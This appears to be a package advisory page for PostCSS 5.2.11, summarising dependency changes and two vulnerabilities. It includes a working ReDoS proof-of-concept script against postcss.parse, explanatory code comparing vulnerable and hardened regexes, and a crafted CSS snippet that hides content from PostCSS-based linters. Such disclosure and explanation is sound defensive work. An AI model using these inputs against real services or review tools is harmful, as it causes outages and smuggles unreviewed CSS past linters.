PostCSS 5.2.11 is a minor update to the popular JavaScript tool for transforming CSS with plugins, building upon version 5.2.10. Both versions share the primary function of enabling developers to manipulate CSS using JavaScript, offering a powerful ecosystem of plugins for tasks like autoprefixing, linting, and future CSS syntax transformations. Core dependencies such as chalk, js-base64, and source-map remain consistent, ensuring continued compatibility and functionality.
However, subtle but important changes exist. Notably, the runtime dependency supports-color is updated from 3.1.2 to 3.2.3. Among the devDependencies, fs-extra moves from 1.0.0 to 2.0.0, a major-version bump that can change behaviour in the build and test tooling; gulp-sourcemaps moves from 2.3.1 to 2.4.0; and babel-core (6.21.0 to 6.22.1), babel-preset-es2015 (6.18.0 to 6.22.0) and lint-staged (3.2.6 to 3.2.7) receive minor bumps. Users who depend on these devDependencies may be affected and should take this into account when updating. Because a package's devDependencies are not installed for consumers of the published module, these bumps matter for PostCSS's own build, testing and tooling rather than for applications that merely depend on postcss; anyone working on PostCSS itself should review the changelogs of the updated packages for bug fixes, performance changes or new features. Upgrading from 5.2.10 to 5.2.11 is a small, low-risk step. Note, however, that 5.2.11 itself remains affected by both advisories listed below: the ReDoS is fixed only in 7.0.36 and 8.2.13 or later, and the \r parsing issue only in 8.4.31 or later, so a version that carries both fixes is 8.4.31 or later.
All the vulnerabilities related to the version 5.2.11 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, and in versions 8.0.0 up to but not including 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js, the code that looks for the trailing sourceMappingURL comment. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds "a{}" followed by n unterminated "/*# sourceMappingURL=" annotations
// and a trailing "!". There is no closing "*/", so every annotation is a
// candidate match that the greedy (.*) must backtrack over before failing,
// and the total matching cost grows quadratically with n.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a benign annotated stylesheet.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse attack strings of growing size and report how long each takes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
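The PoC above needs a vulnerable postcss installed. The following is an added example, not code from PostCSS or from the advisory, that shows the mechanism in isolation: an annotation extractor built around a regex of the shape the advisory describes is placed next to a linear-time replacement, and both are timed on the same attack input the PoC constructs. It assumes the vulnerable extractor is modelled on the pre-fix previous-map.js (a global match with a greedy (.*) followed by \s*\*\/) and that the hardened one locates the last marker with plain string searches; the function names, the marker regex and the attack sizes are the example's own choices.

```javascript
// Added example: vulnerable-shaped versus hardened sourceMappingURL extraction.
// Assumption: VULNERABLE_RE is modelled on the pre-fix previous-map.js regex;
// it is not copied from any PostCSS release.

// Every "/*# sourceMappingURL=" in the input is a match candidate. At each one
// the greedy (.*) runs to the end of the input, then backtracks a character at
// a time looking for "*/": n candidates * O(len) backtracking = O(len^2).
const VULNERABLE_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//gm
const VULNERABLE_ONE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//
// Marker only: no quantifier can absorb the literal that follows it, so the
// scan is linear in the input length.
const MARKER_RE = /\/\*\s*# sourceMappingURL=/gm

function annotationVulnerable(css) {
  const comments = css.match(VULNERABLE_RE)
  if (!comments) return null
  return comments[comments.length - 1].match(VULNERABLE_ONE)[1].trim()
}

function annotationHardened(css) {
  const markers = css.match(MARKER_RE)
  if (!markers) return null
  // Take the last marker and cut at the next "*/"; both are plain string scans.
  const start = css.lastIndexOf(markers[markers.length - 1])
  const end = css.indexOf('*/', start)
  if (end === -1) return null
  return css.slice(start, end).replace(/^\/\*\s*# sourceMappingURL=/, '').trim()
}

// Same construction as the PoC: n unterminated annotations and no "*/".
function buildAttack(n) {
  let css = 'a{}'
  for (let i = 0; i < n; i++) css += '/*# sourceMappingURL='
  return css + '!'
}

function timeMs(extract, css) {
  const t0 = Date.now()
  extract(css)
  return Date.now() - t0
}

// Constructed benign input: both extractors return the same URL.
const benign = 'a{}/*# sourceMappingURL=a.css.map */'
console.log(annotationVulnerable(benign), annotationHardened(benign))

// Constructed attack inputs: the vulnerable column grows roughly 4x per
// doubling of n while the hardened column stays flat.
for (const n of [500, 1000, 2000]) {
  const attack = buildAttack(n)
  console.log('len=' + attack.length +
    ' vulnerable=' + timeMs(annotationVulnerable, attack) + 'ms' +
    ' hardened=' + timeMs(annotationHardened, attack) + 'ms')
}
```

The hardened extractor also differs on inputs with several annotations: the greedy (.*) in the vulnerable regex lets one match span from the first annotation to the last "*/", whereas lastIndexOf plus indexOf always isolates the final comment on its own. The sizes in the loop are deliberately small so the block finishes quickly; the PoC above goes up to 500000 repetitions.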
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, that content will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment. The practical consequence is that what a linter inspects and what a browser applies can differ, so a review of untrusted CSS with PostCSS older than 8.4.31 can miss content that the browser will actually interpret.
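To make the discrepancy concrete, here is an added example, not PostCSS's own tokenizer, that models the single decision behind it: when the tokenizer meets "(" it peeks ahead to the next ")" and, unless a "bad" character lies in between, swallows the whole "(...)" as one opaque brackets token, so a "/*" inside it never opens a comment. The two character classes below are an assumption modelled on the RE_BAD_BRACKET check in lib/tokenize.js before and after 8.4.31, where the fix was to add \r; the rest of the tokenizer is reduced to what the advisory's snippet needs, and the helper names are the example's own.

```javascript
// Added example: a minimal model of the "(...)" decision in the PostCSS
// tokenizer. Assumption: the character classes are modelled on the
// RE_BAD_BRACKET regex before and after the 8.4.31 fix; nothing here is
// copied from a PostCSS release.
const BAD_BRACKET_OLD = /.[\n"'(\/\\]/      // assumed pre-8.4.31 shape: no \r
const BAD_BRACKET_FIXED = /.[\r\n"'(\/\\]/  // \r added

function tokenize(css, badBracket) {
  const tokens = []
  let pos = 0
  while (pos < css.length) {
    const ch = css[pos]
    if (ch === '/' && css[pos + 1] === '*') {
      // Comment: runs to the next "*/" or, if unterminated, to end of input.
      const end = css.indexOf('*/', pos + 2)
      const stop = end === -1 ? css.length : end + 2
      tokens.push(['comment', css.slice(pos, stop)])
      pos = stop
    } else if (ch === '(') {
      const close = css.indexOf(')', pos + 1)
      const content = css.slice(pos, close + 1)
      if (close === -1 || badBracket.test(content)) {
        tokens.push(['(', '('])            // plain paren: scanning continues inside it
        pos += 1
      } else {
        tokens.push(['brackets', content]) // whole "(...)" swallowed as one value
        pos = close + 1
      }
    } else if (/\s/.test(ch)) {
      let end = pos
      while (end < css.length && /\s/.test(css[end])) end++
      tokens.push(['space', css.slice(pos, end)])
      pos = end
    } else if ('{};:)'.includes(ch)) {
      tokens.push([ch, ch])
      pos += 1
    } else {
      // Word: run until a delimiter or the start of a comment.
      let end = pos + 1
      while (end < css.length && !/[\s{};:()]/.test(css[end]) &&
             !(css[end] === '/' && css[end + 1] === '*')) end++
      tokens.push(['word', css.slice(pos, end)])
      pos = end
    }
  }
  return tokens
}

// The first comment token produced, or null if "/*" was swallowed into a value.
function commentSeen(css, badBracket) {
  const tok = tokenize(css, badBracket).find(t => t[0] === 'comment')
  return tok ? tok[1] : null
}

// Constructed sample: the advisory's own snippet. A CSS tokenizer in a browser
// starts a comment at "/*", so everything from there on is hidden from it.
const SAMPLE = '@font-face{ font:(\r/*);}'
console.log('old  :', JSON.stringify(commentSeen(SAMPLE, BAD_BRACKET_OLD)))   // null
console.log('fixed:', JSON.stringify(commentSeen(SAMPLE, BAD_BRACKET_FIXED))) // "/*);}"
// With \n instead of \r the old check already rejects the bracket run, which is
// why only \r produced a discrepancy.
console.log('old with \\n:', JSON.stringify(commentSeen('@font-face{ font:(\n/*);}', BAD_BRACKET_OLD)))
```

In the old shape the "." before the character class cannot match \r (a line terminator) and \r itself is not in the class, so "(\r/*)" passes as a harmless bracket run and the "/*" inside it is treated as part of a property value. Anything an attacker places after that "/*" is therefore visible to a PostCSS-based linter as ordinary rules and declarations while a browser treats it as comment text, which is the mismatch the advisory describes.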